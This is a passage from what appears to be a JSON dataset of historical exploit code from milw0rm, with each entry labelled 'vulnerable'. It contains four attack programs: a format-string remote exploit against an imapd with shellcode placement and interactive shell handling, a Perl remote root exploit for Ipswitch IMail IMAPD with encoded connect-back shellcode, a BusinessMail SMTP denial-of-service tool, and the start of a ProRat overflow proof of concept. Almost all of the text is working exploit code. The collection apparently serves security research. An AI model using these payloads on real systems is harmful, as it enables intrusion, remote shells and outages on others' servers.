TIMEOUT) == ERROR) {\n\n\n\n\t\tprintf(\" closed\\n\\n\");\n\n\t\texit(1);\n\n        }\n\n\n\n\tprintf(\" done!\\n\\n\");\n\n\n\n\tgetinfo(host, imapdport);\n\n\n\n\texploit(host, imapdport);\n\n}\n\n\n\nint connect_timeout(int sfd, struct sockaddr *serv_addr,\n\n\tsocklen_t addrlen, int timeout) {\n\n\n\n\tint res, slen, flags;\n\n\tstruct timeval tv;\n\n\tstruct sockaddr_in addr;\n\n\tfd_set rdf, wrf;\n\n        \n\n\tfcntl(sfd, F_SETFL, O_NONBLOCK);\n\n        \n\n\tres = connect(sfd, serv_addr, addrlen);\n\n\n\n\tif (res >= 0) return res;\n\n\n\n\tFD_ZERO(&rdf);\n\n\tFD_ZERO(&wrf);\n\n\n\n\tFD_SET(sfd, &rdf);\n\n\tFD_SET(sfd, &wrf);\n\n\tbzero(&tv, sizeof(tv));\n\n\ttv.tv_sec = timeout;\n\n\n\n\tif (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0)\n\n\t\treturn -1;\n\n\n\n\tif (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) {\n\n\t\tslen = sizeof(addr);\n\n\t\tif (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1)\n\n\t\treturn -1;\n\n\n\n\t\tflags = fcntl(sfd, F_GETFL, NULL);\n\n\t\tfcntl(sfd, F_SETFL, flags & ~O_NONBLOCK);\n\n\n\n\t\treturn 0;\n\n\t}\n\n\n\n\treturn -1;\n\n}\n\n\n\nvoid shell(char *host, unsigned int port) {\n\n\tint sockfd, n;\n\n\tchar buff[BUFFERSIZE], *command = \"uname -a; id;\\n\";\n\n\tfd_set readfs;\n\n\tstruct hostent *he;\n\n\tstruct sockaddr_in dest_dir;\n\n\n\n\the=gethostbyname(host);\n\n\n\n\tsockfd=socket(AF_INET, SOCK_STREAM, 0);\n\n\n\n\tdest_dir.sin_family = AF_INET;\n\n\tdest_dir.sin_port = htons(port);\n\n\tdest_dir.sin_addr = *((struct in_addr *)he->h_addr);\n\n\tbzero(&(dest_dir.sin_zero), 8);\n\n\n\n\tif(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,\n\n\t\tsizeof(struct sockaddr), TIMEOUT) == ERROR) {\n\n\n\n\t\tprintf(\"\\r\\r\");\n\n\t}\n\n\n\n\telse {\n\n\t\tprintf(\"\\n\\n [!] you have a shell :)\\n\\n\");\n\n\t\tfflush(stdout);\n\n\n\n\t\tsend(sockfd, command, strlen(command), 0);\n\n\n\n\t\twhile(1) {\n\n\t\t\tFD_ZERO(&readfs);\n\n\t\t\tFD_SET(0, &readfs);\n\n\t\t\tFD_SET(sockfd, &readfs);\n\n\t\t\tif(select(sockfd+1, &readfs, NULL, NULL, NULL) < 1) exit(0);\n\n\t\t\tif(FD_ISSET(0,&readfs)) {\n\n\t\t\t\tif((n = read(0,buff,sizeof(buff))) < 1)\n\n\t\t\t\texit(0);\n\n\t\t\t\tif(send(sockfd, buff, n, 0) != n) exit(0);\n\n\t\t\t}\n\n\t\t\tif(FD_ISSET(sockfd,&readfs)) {\n\n\t\t\t\tif((n = recv(sockfd, buff, sizeof(buff), 0)) < 1) exit(0);\n\n\t\t\t\twrite(1, buff, n);\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n}\n\n\n\nvoid getinfo(char *host, unsigned int imapdport) {\n\n\tchar recvbuf[BUFFERSIZE], evilcmd[BUFFERSIZE], temp[BUFFERSIZE],*addr=NULL;\n\n\tstruct hostent *he;\n\n\tstruct sockaddr_in dest_dir;\n\n\tint sockfd, i;\n\n\n\n\tif((he=gethostbyname(host)) == NULL) {\n\n\t\therror(\" gethostbyname()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n        }\n\n\n\n\tprintf(\" [*] getting target info...\\n\");\n\n\tfflush(stdout);\n\n\t\n\n\tfor(i=1; i<50; i++) {\n\n\n\n\t\tbzero(recvbuf, sizeof(recvbuf));\n\n\n\n\t\tsockfd=socket(AF_INET, SOCK_STREAM, 0);\n\n\n\n\t\tdest_dir.sin_family = AF_INET;\n\n\t\tdest_dir.sin_port = htons(imapdport);\n\n\t\tdest_dir.sin_addr = *((struct in_addr *)he->h_addr);\n\n\t\tbzero(&(dest_dir.sin_zero), 8);\n\n\n\n\t\tconnect_timeout(sockfd, (struct sockaddr *)&dest_dir,\n\n\t\t\tsizeof(struct sockaddr), TIMEOUT);\n\n\n\n\t\tread(sockfd, recvbuf, sizeof(recvbuf));\n\n\n\n\t\tmemset(evilcmd, 0x00, sizeof(evilcmd));\n\n\t\tmemset(evilcmd, 0x41, 496);\n\n\t\tstrcat(evilcmd, \"BBBBBBBBBBBB\");\n\n\t\tsprintf(temp, \".%%%u$.8p\\n\", i);\n\n\t\tstrcat(evilcmd, temp);\n\n\n\n\t\twrite(sockfd, evilcmd, strlen(evilcmd));\n\n\t\tread(sockfd, recvbuf, sizeof(recvbuf));\n\n\n\n\t\tclose(sockfd);\n\n\n\n\t\taddr = strstr(recvbuf, \".\");\n\n\t\n\n\t\tif(pos == 0) if(strstr(addr, \"42424242\")) pos = i;\n\n\n\n\t\tif(shaddr == 0) {\n\n\t\t\tif(strstr(addr, \"0x08\")) {\n\n\t\t\t\tif(chkshaddr(host, imapdport, i)) {\n\n\t\t\t\t\tshaddr = strtoul(++addr, 0, 0);\n\n\t\t\t\t\tprintf(\" [*] buffer address\\t\\t: %.8p\\n\", shaddr);\n\n\t\t\t\t\tshaddr += 350;\n\n\t\t\t\t\tprintf(\" [*] shellcode address\\t\\t: %.8p\\n\", shaddr);\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t}\n\n\n\n\t\tif(bretaddr == 0) {\n\n\t\t\tif(strstr(addr, \"0xbf\")) {\n\n\t\t\t\tbretaddr = strtoul(++addr, 0, 0);\n\n\t\t\t\tprintf(\" [*] basic return address\\t: %.8p\\n\", bretaddr);\n\n\t\t\t}\n\n\t\t}\n\n\n\n\t\tif(pos != 0 && shaddr != 0 && bretaddr != 0) break;\n\n\t}\n\n\n\n\tif(shaddr == 0) {\n\n\t\tprintf(\" [*] shellcode address\\t\\t: not found!\\n\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tif(bretaddr == 0) {\n\n\t\tprintf(\" [*] basic return address\\t: not found!\\n\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tprintf(\"\\n\");\n\n}\n\n\n\nint chkshaddr(char *host, unsigned int imapdport, int i) {\n\n\tchar recvbuf[BUFFERSIZE], evilcmd[BUFFERSIZE], temp[BUFFERSIZE],*addr=NULL;\n\n\tstruct hostent *he;\n\n\tstruct sockaddr_in dest_dir;\n\n\tint sockfd;\n\n\n\n\the=gethostbyname(host);\n\n\n\n\tbzero(recvbuf, sizeof(recvbuf));\n\n\n\n\tsockfd=socket(AF_INET, SOCK_STREAM, 0);\n\n\n\n\tdest_dir.sin_family = AF_INET;\n\n\tdest_dir.sin_port = htons(imapdport);\n\n\tdest_dir.sin_addr = *((struct in_addr *)he->h_addr);\n\n\tbzero(&(dest_dir.sin_zero), 8);\n\n\n\n\tconnect_timeout(sockfd, (struct sockaddr *)&dest_dir,\n\n\t\tsizeof(struct sockaddr), TIMEOUT);\n\n\n\n\tread(sockfd, recvbuf, sizeof(recvbuf));\n\n\n\n\tmemset(evilcmd, 0x00, sizeof(evilcmd));\n\n\tmemset(evilcmd, 0x41, 496);\n\n\tstrcat(evilcmd, \"BBBBBBBBBBBB\");\n\n\tsprintf(temp, \"%%%u$s\\n\", i);\n\n\tstrcat(evilcmd, temp);\n\n\n\n\twrite(sockfd, evilcmd, strlen(evilcmd));\n\n\tread(sockfd, recvbuf, sizeof(recvbuf));\n\n\t\n\n\tclose(sockfd);\n\n\n\n\tif(strstr(recvbuf, \"$s\")) return 1;\n\n\n\n\telse return 0;\n\n}\n\n\n\nvoid exploit(char *host, unsigned int imapdport) {\n\n\tchar evilcmd[BUFFERSIZE], temp[BUFFERSIZE], recvbuf[BUFFERSIZE];\n\n\tint cn1, cn2, cn3, cn4, sockfd, retaddr;\n\n\tunsigned int bal1, bal2, bal3, bal4;\n\n\tstruct hostent *he;\n\n\tstruct sockaddr_in dest_dir;\n\n\n\n\tif((he=gethostbyname(host)) == NULL) {\n\n\t\therror(\" gethostbyname()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n        }\n\n\n\n\tfor(retaddr=bretaddr; retaddr>=(bretaddr-500); retaddr -= 4) {\n\n\t\n\n\t\tprintf(\" [*] searching ret address...\\t: %010p\", retaddr);\n\n\t\tfflush(stdout);\n\n\n\n\t\tbzero(evilcmd, sizeof(evilcmd));\n\n\t\tmemset(evilcmd, 0x90, 496);\n\n\n\n\t\tif(cback) memcpy(evilcmd + 350, conn_back, strlen(conn_back));\n\n\n\n\t\telse memcpy(evilcmd + 350, port_bind, strlen(port_bind));\n\n\n\n\t\tbzero(temp, sizeof(temp));\n\n\t\tsprintf(temp, \"%s\", &retaddr);\n\n\t\tstrncat(evilcmd, temp, 4);\n\n\t\tretaddr++;\n\n\t\tsprintf(temp, \"%s\", &retaddr);\n\n\t\tstrncat(evilcmd, temp, 4);\n\n\t\tretaddr++;\n\n\t\tsprintf(temp, \"%s\", &retaddr);\n\n\t\tstrncat(evilcmd, temp, 4);\n\n\n\n\t\tbal1 = (shaddr & 0xffff0000) >> 16;\n\n\t\tbal2 = (shaddr & 0x0000ffff);\n\n\n\n\t\tcn1 = bal2 - 496 - 12;\n\n\t\tcn1 = check(cn1);\n\n\t\tcn2 = bal1 - bal2;\n\n\t\tcn2 = check(cn2);\n\n\n\n\t\tsprintf(temp, \"%%%du%%%u$n%%%du%%%u$n\", cn1, pos, cn2, pos+2);\n\n\t\tstrcat(evilcmd, temp);\n\n\t\tstrcat(evilcmd, \"\\n\");\n\n\n\n\t\tif((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {\n\n\t\t\tperror(\" socket\");\n\n\t\t\tprintf(\"\\n\");\n\n\t\t\texit(1);\n\n\t\t}\n\n\n\n\t\tdest_dir.sin_family = AF_INET;\n\n\t\tdest_dir.sin_port = htons(imapdport);\n\n\t\tdest_dir.sin_addr = *((struct in_addr *)he->h_addr);\n\n\t\tbzero(&(dest_dir.sin_zero), 8);\n\n\n\n\t\tif(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,\n\n\t\t\tsizeof(struct sockaddr), TIMEOUT) == ERROR) {\n\n\n\n\t\t\tprintf(\" closed\\n\\n\");\n\n\t\t\texit(1);\n\n\t\t}\n\n\n\n\t\tif (read(sockfd, recvbuf, sizeof(recvbuf)) <= 0) {\n\n\t\t\tperror(\" read()\");\n\n\t\t\tprintf(\"\\n\");\n\n\t\t\texit(1);\n\n\t\t}\n\n\n\n\t\tif (write(sockfd, evilcmd, strlen(evilcmd)) <= 0) {\n\n\t\t\tperror(\" write()\");\n\n\t\t\tprintf(\"\\n\");\n\n\t\t\texit(1);\n\n\t\t}\n\n\n\n\t\tclose(sockfd);\n\n\n\n\t\tif(cback) {\n\n\t\t\tprintf(\"\\r\\r\");\n\n\t\t\tcontinue;\n\n\t\t}\n\n\n\n\t\telse shell(host, PORTBIND);\n\n\n\n\t\tretaddr -= 2;\n\n\t}\n\n\n\n\tif(cback) printf(\"\\n\\n [!] finished!\\n\\n\");\n\n\n\n\telse printf(\"\\n\\n [!] failed!\\n\\n\");\n\n}\n\n\n\nint check(unsigned long addr) {\n\n\tchar tmp[128];\n\n\tsnprintf(tmp, sizeof(tmp), \"%d\", addr);\n\n\tif(atoi(tmp) < 10)\n\n\taddr = addr + 65536;\n\n\treturn addr;\n\n}\n\n\n\nvoid use(char *program) {\n\n\tprintf(\" use: %s -h <target_host> [-p <target_port>]\\n\", program);\n\n\tprintf(\"      %s -h <target_host> -c <your_host> [-b <your_port>]\\n\\n\", program);\n\n\tprintf(\"\t\t-p\ttarget imapd port (143 by default)\\n\");\n\n\tprintf(\"\t\t-c\tyour host/ip\\n\");\n\n\tprintf(\"\t\t-b\tyour port (45295 by default)\\n\\n\");\n\n\texit(1);\n\n}\n\n\n\n// milw0rm.com [2005-08-01]",
665        "vulnerable": true
666    },
667    {
668        "exploit_id": 1124,
669        "content": "# IpSwitch IMAIL Server IMAPD Remote r00t Exploit by kcope\n\n# June 2005\n\n# Confidential!\n\n\n\nuse IO::Socket;\n\n\n\n# 316 bytes\n\n$cbsc = \n\n\"\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9\\x25\\x01\\x80\\x34\\x0B\\xC2\\xE2\\xFA\"\n\n.\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"\n\n.\"\\x2B\\x39\\xC2\\xC2\\xC2\\x9D\\xA6\\x63\\xF2\\xC2\\xC2\\xC2\\x49\\x82\\xCE\\x49\"\n\n.\"\\xB2\\xDE\\x6F\\x49\\xAA\\xCA\\x49\\x35\\xA8\\xC6\\x9B\\x2A\\x59\\xC2\\xC2\\xC2\"\n\n.\"\\x20\\x3B\\xAA\\xF1\\xF0\\xC2\\xC2\\xAA\\xB5\\xB1\\xF0\\x9D\\x96\\x3D\\xD4\\x49\"\n\n.\"\\x2A\\xA8\\xC6\\x9B\\x2A\\x40\\xC2\\xC2\\xC2\\x20\\x3B\\x43\\x2E\\x52\\xC3\\xC2\"\n\n.\"\\xC2\\x96\\xAA\\xC3\\xC3\\xC2\\xC2\\x3D\\x94\\xD2\\x92\\x92\\x92\\x92\\x82\\x92\"\n\n.\"\\x82\\x92\\x3D\\x94\\xD6\\x49\\x1A\\xAA\\xBD\\xC2\\xC2\\xC3\\xAA\\xC0\\xC2\\xC2\"\n\n.\"\\xF7\\x49\\x0E\\xA8\\xD2\\x93\\x91\\x3D\\x94\\xDA\\x47\\x02\\xB7\\x88\\xAA\\xA1\"\n\n.\"\\xAF\\xA6\\xC2\\x4B\\xA4\\xF2\\x41\\x2E\\x96\\x4F\\xFE\\xE6\\xA8\\xD7\\x9B\\x69\"\n\n.\"\\x20\\x3F\\x04\\x86\\xE6\\xD2\\x86\\x3C\\x86\\xE6\\xFF\\x4B\\x9E\\xE6\\x8A\\x4B\"\n\n.\"\\x9E\\xE6\\x8E\\x4B\\x9E\\xE6\\x92\\x4F\\x86\\xE6\\xD2\\x96\\x92\\x93\\x93\\x93\"\n\n.\"\\xA8\\xC3\\x93\\x93\\x3D\\xB4\\xF2\\x93\\x3D\\x94\\xC6\\x49\\x0E\\xA8\\x3D\\x3D\"\n\n.\"\\xF3\\x3D\\x94\\xCA\\x91\\x3D\\x94\\xDE\\x3D\\x94\\xCE\\x93\\x94\\x49\\x87\\xFE\"\n\n.\"\\x49\\x96\\xEA\\xBA\\xC1\\x17\\x90\\x49\\xB0\\xE2\\xC1\\x37\\xF1\\x0B\\x8B\\x83\"\n\n.\"\\x6F\\xC1\\x07\\xF1\\x19\\xCD\\x7C\\xD2\\xF8\\x14\\xB6\\xCA\\x03\\x09\\xCF\\xC1\"\n\n.\"\\x18\\x82\\x29\\x33\\xF9\\xDD\\xB7\\x25\\x98\\x49\\x98\\xE6\\xC1\\x1F\\xA4\\x49\"\n\n.\"\\xCE\\x89\\x49\\x98\\xDE\\xC1\\x1F\\x49\\xC6\\x49\\xC1\\x07\\x69\\x9C\\x9B\\x01\"\n\n.\"\\x2A\\xC2\\x3D\\x3D\\x3D\\x4C\\x8C\\xCC\\x2E\\xB0\\x3C\\x71\\xD4\\x6F\\x1B\\xC7\"\n\n.\"\\x0C\\xBC\\x1A\\x20\\xB1\\x09\\x2F\\x3E\\xF9\\x1B\\xCB\\x37\\x6F\\x2E\\x3B\\x68\"\n\n.\"\\xA2\\x25\\xBB\\x04\\xBB\";\n\n\n\n$numtargets = 12;\n\n\n\n@targets = \n\n(\n\n [\"Ipswitch IMAIL Server IMAPD 7.04\", \"\\x5F\\x2E\\x01\\x10\", 1],\n\n [\"Ipswitch IMAIL Server IMAPD 7.07\", \"\\x3F\\x34\\x01\\x10\", 1],\n\n [\"Ipswitch IMAIL Server IMAPD 7.13\", \"\\x33\\x36\\x01\\x10\", 1],\n\n [\"Ipswitch IMAIL Server IMAPD 7.15\", \"\\x53\\x36\\x01\\x10\", 1],\n\n [\"Ipswitch IMAIL Server IMAPD 8.00/8.01/8.02/8.03\", \"\\x53\\x36\\x01\\x10\", 1],\n\n [\"Ipswitch IMAIL Server IMAPD 8.04\", \"\\x73\\x36\\x01\\x10\", 1],\n\n [\"Ipswitch IMAIL Server IMAPD 8.05 NO HOTFIX\", \"\\xB3\\x36\\x01\\x10\", 1],\n\n [\"Ipswitch IMAIL Server IMAPD 8.05HF1/8.05HF2/8.05HF3\", \"\\x03\\x37\\x01\\x10\", 1],\n\n [\"Ipswitch IMAIL Server IMAPD 8.10\", \"\\xfe\\xf9\\x01\\x10\", 0],\n\n [\"Ipswitch IMAIL Server IMAPD 8.11\", \"\\x8e\\x02\\x02\\x10\", 0],\n\n [\"Ipswitch IMAIL Server IMAPD 8.12/8.13/8.14\", \"\\x2e\\x0b\\x02\\x10\", 0],\n\n [\"Ipswitch IMAIL Server IMAPD 8.15\", \"\\x0e\\x0e\\x02\\x10\", 0]\n\n);\n\n\n\nprint \"IpSwitch IMAIL Server IMAPD Remote r00t Exploit by kcope VER1\\n\";\n\nif ($#ARGV ne 3) {\n\n\tprint \"usage: imail.pl target targettype yourip yourport\\n\\n\";\n\n    for ($i=0; $i<$numtargets; $i++) {\n\n\t print \" [\".$i.\"]...\". $targets[$i][0]. \"\\r\\n\";\n\n    }\t\n\n\texit(0);\t\n\n}\n\n\n\n$tt=$ARGV[1];\n\n$ret = $targets[$tt][1];\n\n$cbip=$ARGV[2];\n\n$cbport=$ARGV[3];\n\n\n\n($a1, $a2, $a3, $a4) = split(//, gethostbyname(\"$cbip\"));\n\n$a1 = chr(ord($a1) ^ 0xc2);\n\n$a2 = chr(ord($a2) ^ 0xc2);\n\n$a3 = chr(ord($a3) ^ 0xc2);\n\n$a4 = chr(ord($a4) ^ 0xc2);\n\nsubstr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);\n\n\n\n($p1, $p2) = split(//, reverse(pack(\"s\", $cbport)));\n\n$p1 = chr(ord($p1) ^ 0xc2);\n\n$p2 = chr(ord($p2) ^ 0xc2);\n\nsubstr($cbsc, 118, 2, $p1 . $p2);\t  \n\n\n\nprint \"[*] $ARGV[0]\\n\";\n\nprint \"[*] \".$targets[$tt][0].\"\\n\";\n\n\n\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\n                              PeerPort => '143',\n\n                              Proto    => 'tcp');\n\n\n\n$findsc=\"\\x83\\xc0\\x04\\x81\\x38\\x53\\x45\\x58\\x59\\x74\\x02\\xeb\\xf3\\x83\\xc0\\x04\\xff\\xe0\";\n\n\n\nif ($targets[$tt][2] eq 0) {\n\n $a=\"@\" . \"SEXY\" . $cbsc . \"A\" x 358 . \"\\xeb\\x04\" . $ret . \"AAAA\" . $findsc . \"A\" x 1000;\t# IMAIL > 8.00\n\n}\n\n\n\nif ($targets[$tt][2] eq 1) {\n\n $a=\"@\" . \"SEXY\" . $cbsc . \"A\" x 366 . \"\\xeb\\x04\" . $ret . \"AAAA\" . $findsc . \"A\" x 1000;\t# IMAIL 8.00\n\n}\n\n\n\nprint $sock \"a001 LOGIN \\\"\" . $a . \"\\\" password\\r\\n\";\n\n\n\nwhile(<$sock>) {\n\n\t\tprint;\n\n}\n\n\n\n# milw0rm.com [2005-08-01]",
670        "vulnerable": true
671    },
672    {
673        "exploit_id": 1126,
674        "content": "/*****************************************************************\n\n\n\nBusinessMail Server Remote Denial of Service Exploit by Kozan\n\n( Based on Reed Arvin's code in perl )\n\n\n\nApplication: BusinessMail Server 4.60.00\n\nVendor: www.netcplus.com\n\n\n\nDiscovered by:  Reed Arvin\n\nExploit Coded by: Kozan\n\nCredits to ATmaCA,  Reed Arvin\n\nWeb: www.spyinstructors.com\n\nMail: kozan@spyinstructors.com\n\n\n\n*****************************************************************/\n\n\n\n#include <winsock2.h>\n\n#include <windows.h>\n\n#include <stdio.h>\n\n\n\n#pragma comment(lib,\"ws2_32.lib\")\n\n\n\nchar Buff[] =\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\";\n\n\n\nint main(int argc, char *argv[])\n\n{\n\n       fprintf(stdout, \"BusinessMail Server Remote Denial of Service Exploit by Kozan\\n\");\n\n       fprintf(stdout, \"Discovered by: Reed Arvin\\n\");\n\n       fprintf(stdout, \"Exploit Coded by: Kozan\\n\");\n\n       fprintf(stdout, \"Credits to ATmaCA, Reed Arvin\\n\\n\");\n\n       fprintf(stdout, \"www.spyinstructors.com - kozan@spyinstructors.com\\n\");\n\n\n\n       if(argc<2)\n\n       {\n\n               fprintf(stderr, \"\\n\\nUsage: %s [Target IP]\\n\\n\", argv[0]);\n\n               return -1;\n\n       }\n\n       WSADATA wsaData;\n\n       SOCKET sock;\n\n\n\n       if( WSAStartup(0x0101,&wsaData) < 0 )\n\n       {\n\n               fprintf(stderr, \"Winsock error!\\n\");\n\n               return -1;\n\n       }\n\n\n\n       sock = socket(AF_INET,SOCK_STREAM,0);\n\n       if( sock == -1 )\n\n       {\n\n               fprintf(stderr, \"Socket error!\\n\");\n\n               return -1;\n\n       }\n\n\n\n       struct sockaddr_in addr;\n\n\n\n       addr.sin_family = AF_INET;\n\n       addr.sin_port = htons(25);\n\n       addr.sin_addr.s_addr = inet_addr(argv[1]);\n\n       memset(&(addr.sin_zero), '\\0', 8);\n\n\n\n       fprintf(stdout, \"Connecting to %s ...\\n\", argv[1]);\n\n\n\n       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )\n\n       {\n\n               fprintf(stderr, \"Connection failed!\\n\");\n\n               closesocket(sock);\n\n               return -1;\n\n       }\n\n\n\n       fprintf(stdout, \"Connected.\\n\");\n\n\n\n       char szBuf1[1024], szBuf2[1024];\n\n\n\n       wsprintf(szBuf1, \"HELO %s\\r\\n\", Buff);\n\n       wsprintf(szBuf2, \"MAIL FROM:%s\\r\\n\", Buff);\n\n\n\n       fprintf(stdout, \"Sending HELO ...\\n\");\n\n\n\n       if( send(sock,szBuf1,strlen(szBuf1),0) == -1 )\n\n       {\n\n               fprintf(stderr, \"HELO string could not sent!\\n\");\n\n               closesocket(sock);\n\n               return -1;\n\n       }\n\n\n\n       fprintf(stdout, \"Sending MAIL FROM ...\\n\");\n\n\n\n       if( send(sock,szBuf2,strlen(szBuf2),0) == -1 )\n\n       {\n\n               fprintf(stderr, \"MAIL FROM string could not sent!\\n\");\n\n               closesocket(sock);\n\n               return -1;\n\n       }\n\n\n\n       fprintf(stdout, \"Operation completed...\\n\");\n\n       closesocket(sock);\n\n       WSACleanup();\n\n\n\n       return 0;\n\n}\n\n\n\n// milw0rm.com [2005-08-01]",
675        "vulnerable": true
676    },
677    {
678        "exploit_id": 1127,
679        "content": "/* if this worked for you send me an email.\n\n /str0ke */\n\n\n\n/******************************************************************************************\n\n\n\n\tProRat Server Buffer Overflow Crash POC\n\n\thttp://www.prorat.net/products.php?product=ProRat\n\n\n\n\tDiscovered and Coded by evil dabus\n\n\te-mail:\tevil_dabus [at] yahoo.com\n\n\n\n\tTested on ProRat Server version 1.9 (Fix-2) Public Edition\n\n        on a Windows XP Professional sp2 operating system.\n\n\n\n\tThis exploit connects to the ProRat server (default port 5110) and sends\n\n        a long null command string.\n\n\tAfter the exploit send, the ProRat Server will crash, trying to access\n\n\tto a bad memory address: 0x41414141.\n\n        Remote users are able to  cause  the  server to  crash or potentially\n\n        execute arbitrary code.\n\n\n\n*******************************************************************************************/\n\n\n\n#include <windows.h>\n\n#include <winsock.h>\n\n#include <stdio.h>\n\n\n\n#define BUFSIZE                 0x280\n\n#define NOP                     0x90\n\n#define PORT                    5110                            // default port\n\n#define RET_ADDR                \"\\x41\\x41\\x41\\x41\"              // crash\n\n#define NULL_PING_COMMAND       \"\\x30\\x30\\x30\\x30\\x30\\x30\"\n\n\n\nvoid\n\nbanner() {\n\n        printf(\"- ProRat v1.9:Fix-2 remote buffer overflow\\n\");\n\n\tprintf(\"- Coded by evil dabus (evil_dabus [at] yahoo.com)\\n\");\n\n}\n\nvoid\n\nusage(char *prog) {\n\n        banner();\n\n\n\n        printf(\"- Usage: %s <target ip> [target port]\\n\", prog);\n\n        printf(\"\\n\");\n\n\n\n        exit(1);\n\n}\n\n\n\nvoid\n\nmain(int argc, char *argv[])\n\n{\n\n        WSADATA wsaData;\n\n        struct hostent *pTarget;\n\n        struct sockaddr_in sock;\n\n        SOCKET s;\n\n        int iPort = PORT;\n\n        char szRecvBuf[BUFSIZE+1];\n\n        char szExpBuff[BUFSIZE];\n\n\n\n        if (argc < 2)   usage(argv[0]);\n\n        if (argc==3)    iPort = atoi(argv[2]);\n\n\n\n        printf(\"\\n[+] Initialize windows sockets.\");\n\n        if (WSAStartup(MAKEWORD(2,0), &wsaData) < 0) {\n\n                printf(\"\\n[-] WSAStartup failed! Exiting...\");\n\n                return;\n\n        }\n\n\n\n        printf(\"\\n[+] Initialize socket.\");\n\n        s = socket(AF_INET, SOCK_STREAM\t, 0);\n\n        if(s == INVALID_SOCKET){\n\n                printf(\"\\n[-] Error socket. Exiting...\");\n\n                exit(1);\n\n        }\n\n\n\n        printf(\"\\n[+] Resolving host info.\");\n\n        if ((pTarget = gethostbyname(argv[1])) == 